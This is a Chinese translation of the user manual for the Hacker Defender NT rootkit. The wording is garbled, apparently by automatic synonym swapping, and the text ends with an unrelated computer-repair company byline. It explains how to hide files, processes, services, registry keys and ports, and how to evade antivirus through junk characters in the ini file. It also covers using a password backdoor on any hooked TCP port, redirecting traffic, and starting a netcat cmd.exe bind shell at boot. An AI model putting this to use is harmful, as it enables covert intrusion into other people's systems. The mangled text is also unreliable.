Hacker defender 中文使用说明
[翻译]Hacker defender 中文利用阐明
文章译者:ZiQi [E.S.T]
信息来源:险恶八进制安全小组(www.eviloctal.com)
才疏学浅,不便之处,还请多多包容。
=============[Hacker defender -中文利用阐明]================
NT Rootkit
----------
作者: Holy_Father
Ratter/29A
版本: 1.0.0
开辟日期: 01.01.2004
网站: http://rootkit.host.sk, http://hxdef.czweb.org
开辟群: ch0pper
aT4r
phj34r
unixdied <0edfd3cfd9f513ec030d3c7cbdf54819@hush.ai>
rebrinak
GuYoMe
ierdna
Afakasf
阐明: Czech & English by holy_father
French by GuYoMe
Chinese by Ziqi
=====[1,目录]==============================================
1. 目录
2. 概要
2.1 关于
2.2 阐明
3. 利用阐明
4. Ini文件阐明
5. Backdoor
5.1 Redirector
6. 技能支持
6.1 版本
6.2 钩子API函数
6.3 已知的 bugs
7. Faq
8. 文件
=====[ 2. 关于]================================================
Hacker defender (hxdef)是一个利用于Windows NT 4.0, Windows 2000 以及Windows XP操纵系统的一个NTROOKIT,它也能运行于之后的基于NT的操纵系统。主要代码是由DELPHI 6完成。新的功效利用汇编书写。驱动代码由C完成。后门和redirector客服端大部分利用 Delphi 6完成。
=====[ 2.1 概要 ]=============================================
步伐的主要功效是在全部运行中的进程中重写支解内存,重写一些根本的模块转变进程的形态,它几乎可以或许改写全部不影响系统稳定和正在运行中的进程。
步伐可以或许完全隐蔽,如今可以或许做的有隐蔽文件、进程、系统服务、系统驱动、注册表的键值和键、开放端口以及假造可用磁盘空间。步伐同时也在内存中伪装它所做的窜改,并且潜伏地控制被隐蔽进程。步伐安置后能构造后门、注册表、系统服务,构造系统驱动。其本身的后门技能容许其植入 redirector。
=====[ 2.2 阐明]====================================================
本项目1.0.0版本是开起源代码。
利用Hacker defender所形成的结果作者本人概不卖力。
=====[ 3. 用法 ]==================================================
一个利用hxdef的简略例子:
>hxdef100.exe [inifile]
大概
>hxdef100.exe [switch]
直接执行EXE文件,不带任何的参数时间,默许的inifile文件为步伐名.ini 。
当你执行hedef100不指定ini文件,大概你以参数形式运行时间,默许的文件是
hxdef100.ini。
下面的参数是有用的:
-:installonly - 只安置服务,不运行
-:refresh - 从INI文件中更新设置
-:noservice - 正常运行不安置服务
-:uninstall - 移除hxdef删除全部运行的后门连接,同时停止hxdef服务
比方:
>hxdef100.exe -:refresh
Hxdef拥有默许INI文件,但是我们猛烈的保举你建立本身的ini文件。关于ini文件的介绍可以看第4部分ini文件部分。
参数 -:refresh and -:uninstall 来源于原来的EXE文件。这就意味这你只需知道hxdef的运行途径和EXE名,就可以或许转变它的设置大概进行移除工作。
=====[ 4. Ini文件 ]============================================
ini文件必须包罗了9个部分: [Hidden Table], [Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup Run], [Free Space], [Hidden Ports]和[Settings]。
在 [Hidden Table], [Root Processes], [Hidden Services]和[Hidden RegValues] 中可以或许利用*取代后面的字符,星号仅仅利用于字符的后面,任安在*之前的都是无效的。全部的在字符之前和之后的空格也是无效的。
比方:
[Hidden Table]
hxdef*
将开端隐蔽全部在Hidden Table中以"hxdef"扫尾的文件、文件夹和系统进程。
在该文件列表中的全部文件和文件夹都将在文件办理器中消散。在这个列表中的步伐也会在任务办理器中被隐蔽。必须确保主要文件,INI文件,你的后门文件和驱动文件被包罗在列表中。
在步伐列表中的主进程对熏染具有免淤能力,你只能利用这些主步伐才气看见隐蔽的文件,文件夹和步伐。以是,主进程是为rootkit办理员所利用的。
由服务和驱动所构成的Hidden Services列表将会隐蔽在数据库中的安置服务和驱动。rootkit主步伐的服务名默以为HackerDefender100,rootkit驱动的驱动名默以为HackerDefenderDrv100。它们两者都可以经过ini文件进行修正。
Hidden RegKeys中列出的注册表键值将会被隐蔽,Rootkit在注册表中有四个键值:默许的是HackerDefender100, LEGACY_HACKERDEFENDER100, HackerDefenderDrv100, LEGACY_HACKERDEFENDERDRV100 要是你要重新定名服务名大概驱动名,你需要在列表中做相应的转变。
开端2个键值是和你的服务据用雷同名字的,接上去的键值是LEGACY_名字。比方,要是你转变你的服务名称为BoomThisIsMySvc ,那么在注册表中,应该是如许表示的,LEGACY_BOOMTHISISMYSVC。
在Hidden RegValues列出的注册表的值将会被隐蔽。
Startup Run列表中列出的是rootkit步伐运行之后的自启动步伐。这些步伐和ROOTKIT具有一样的特权。步伐名和它后面的参数以?离开。不要利用"字符,步伐将会在用户登岸以后终止,在用户登岸以后可以利用一般和罕见的方法。你可以利用下面这些快捷方法。
%cmd%标准系统的shell和途径
%cmddir%标准系统的shell文件夹
%sysdir% - 系统文件夹
(e.g. C:\winnt\system32\)
%windir% - 标准系统文件夹
(e.g. C:\winnt\)
%tmpdir% - 临时文件夹
(e.g. C:\winnt\temp\)
比方:
1)
[Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe
nc-shell将会在rootkit运行以后监听100端口
2)
[Startup Run]
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt
将rootkit启动时间生存在系统临时文件夹夹starttime。Txt文件。
(%TIME%仅仅运行于Windows2000以上的操纵系统。)
Free Space中列出的驱动硬盘名和容量大小是你想增加的硬盘,它的格式是X:NUM,此中X表示磁盘驱动器的名称,NUM表示你要增加的磁盘的容量。
比方:
[Free Space]
C:123456789
这将在C盘增加大约123M的磁盘空间。
Hidden Ports中列出的是你需要隐蔽步伐的端口,比如利用OpPorts, FPort, Active Ports, Tcp View等的步伐,它最多拥有2行。第1行的格式是TCP:tppport1,tcpport2,tcpport3 ,第2行的格式是UDP:udpport1,udpport2,udpport3 ...
比方:
1)
[Hidden Ports]
TCP:8080,456
这将隐蔽2个TCP端口:8080和456
2)
[Hidden Ports]
TCP:8001
UDP:12345
这将隐蔽2个端口:TCP的8001和UDP的12345。
3)
[Hidden Ports]
TCP:
UDP:53,54,55,56,800
隐蔽5个端口,都为UDP端口:53,54,55,56,800。
Settings包罗了8个值:Password, BackdoorShell, FileMappingName, ServiceName,ServiceDisplayName, ServiceDescription, DriverName 和 DriverFileName。
名。
16位字符的Password被用于后门链接和转向,密码能凭据短一些,余下的用空格取代。
BackdoorShell是复制于系统的SHELL文件,它被后门创建于一个临时的目录下。
FileMappingName,当钩子进程被存储时,用于共享内存。
ServiceName是rootkit服务
ServiceDisplayName为rootkit表现的服务
ServiceDescription位rootkit的服务描述
DriverName以hxdef驱动定名
DriverFileName以hxdef驱动文件定名
比方;
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdef?.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender100
ServiceDisplayName=HXD Service 100
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
这就意味着你的后门密码为hxdef-rulez,后门将复制系统shell文件(通常是CMD.EXE)为hxdef?.exe来临时目录。共享内存将变为"_.-=[Hacker Defender]=-._",服务名为"HackerDefender100",它表现的名称为"HXD Service 100",它的描述为"poweful NT rootkit",驱动名为"HackerDefenderDrv100",驱动将被存储于一个叫做"hxdefdrv.sys"的文件中。
扩展字符|, <, >, :, \, / 和 "在全部的行中都会被纰漏,除了[Startup Run], [Free Space] 和 [Hidden Ports] 项目和在 [Settings] 中first = character后面的值。利用扩展字符能然你的INIFILE文件摆脱杀毒软件的查杀。
比方:
Example:
[H<<
>h"xdef"*
和下面的是一样的。
[Hidden Table]
hxdef*
更多的比方可以参照hxdef100.ini 和hxdef100.2.ini文件。
全部的在ini文件中的字符串除了那些在Settings 和 Startup Run中的,都是无效的。
=====[ 5. Backdoor ]=========================================
Rootkit步伐 Hook了一些API的功效,连接吸收一些来自网络的数据包。要是吸收的数据即是256个字节,密码和服务被确认,复制的SHELL被临时创建,这种情况建立以后,下一次的数据吸收被重定向到这个SHELL上。
由于rootkit步伐 Hook了系统中全部进程,全部在服务器上的TCP端口都将变为后门。比方,要是目标主机开放了提供HTTP服务的80端口,这个端口也能作为一个有用的后门。例外的是这个开放端口的进程不会被Hook,这个后门仅仅工作于服务器的吸收缓冲大于大概即是256个字节。但是这个特征几乎得当于全部标准的服务,像IIS,APACHE,ORACLE等。后门可以或许隐蔽是由于全部的数据都经过系统下面提供的服务转发。以是你不克不及利用一些简略的端口扫描软件找到它,并且它能轻易的穿过防火墙。
在测试发明IIS服务过程中,HTTP服务不克不及记录任何的连接日志,FTP和SMTP服务器仅仅能记录结束的断开连接。以是,要是你运行hxdef在有IIS Web服务的服务器下面,HTTP端口跟你是连接呆板利用的后门的最好端口。
要是你想连接后门的话,你将不得不利用利用一些分外的客户端,步伐bdcli100.exe就是被用于如此的。
用法:bdcli100.exe host port password
比方:
>bdcli100.exe www.windowsserver.com 80 hxdef-rulez
连接服务器www.windowsserver.com利用默许的密码。客户端1.0.0版本不兼容其他老的版本。
=====[ 5.1 Redirector ]==========================================
Redirector是基于后门技能。第一个连接包和后门连接一样。这就意味着你能利用雷同的端口。下一个包是仅仅为Redirector特别的包,这些包由基于运行用户电脑的重定向器天生.第一个重定向的包连接特定的目标主机和端口。
Redirectors的设置生存在与EXE文件同名的INI文件中(以是默许的是rdrbs100.ini)。要是这个文件不存在,那么在EXE文件运行的时间它会主动建立一个。最好不要额外的修正INI文件。全部的设置都可以在console中进行转变。
当ROOTKIT被安置时,要是我们需要利用服务器下面的redirectors功效,我们首先要在本地运行步伐。在控制台上我们可以在有HXDEF的服务器下面建立一个映射端口路由。最后我们连接本地端口并且转换数据。转向的数据被rootkit的密码加密。在这个版本中连接的速率被限定在256K左右。在这个版本中redirectors并不得当于高速连接。Redirectors也会遭到安置有rootkit的服务器的限定,并且Redirectors仅仅利用TCP协议连接。在这个版本中Redirectors base有19条命令,他们并不黑白常的敏感。关于功效的细致描述可以利用HELP命令。在Redirectors base启动时,startup-list中的命令也被执行。startup-list中的命令可以用利用SU启动的CMD进行编辑。
Redirector区分于2种连接范例(HTTP和其他)。要是连接是其他范例的,数据包将不会被转变。要是是HTTP范例,在HTTP文件头的HOST参数将会转变为目标服务器。一个base的最大Redirector数目是1000。
Redirector仅仅适用于NT结构,只有在拥有图标的NT步伐下你才气利用HIDE命令隐蔽控制台。只有在NT下才气无声无息的运行,没有数据输入,没有图标,仅仅执行startup-list中的命令。
例子:
1)失掉端口映射信息
>MPINFO
No mapped ports in the list.
2)增加MPINFO命令到startup-list并且失掉startup-list中的命令。
>SUADD MPINFO
>sulist
0) MPINFO
3)利用HELP命令。
>HELP
Type HELP COMMAND for command details.
Valid commands are:
HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD,
DEL,
DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
>HELP ADD
Create mapped port. You have to specify domain when using HTTP
type.
usage: ADD
>HELP EXIT
Kill this application. Use DIS flag to discard unsaved data.
usage: EXIT [DIS]
4)增加端口映射,我们在本地100端口进行监听,ROOTKIT安置在服务器200.100.2.36的80端口上,目标服务器是www.google.com80端口。,rootkit的密码是bIgpWd,连接范例HTTP,目标主机(www.google.com)我们知道它的IP地点是216.239.53.100。
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
评论加载中...
|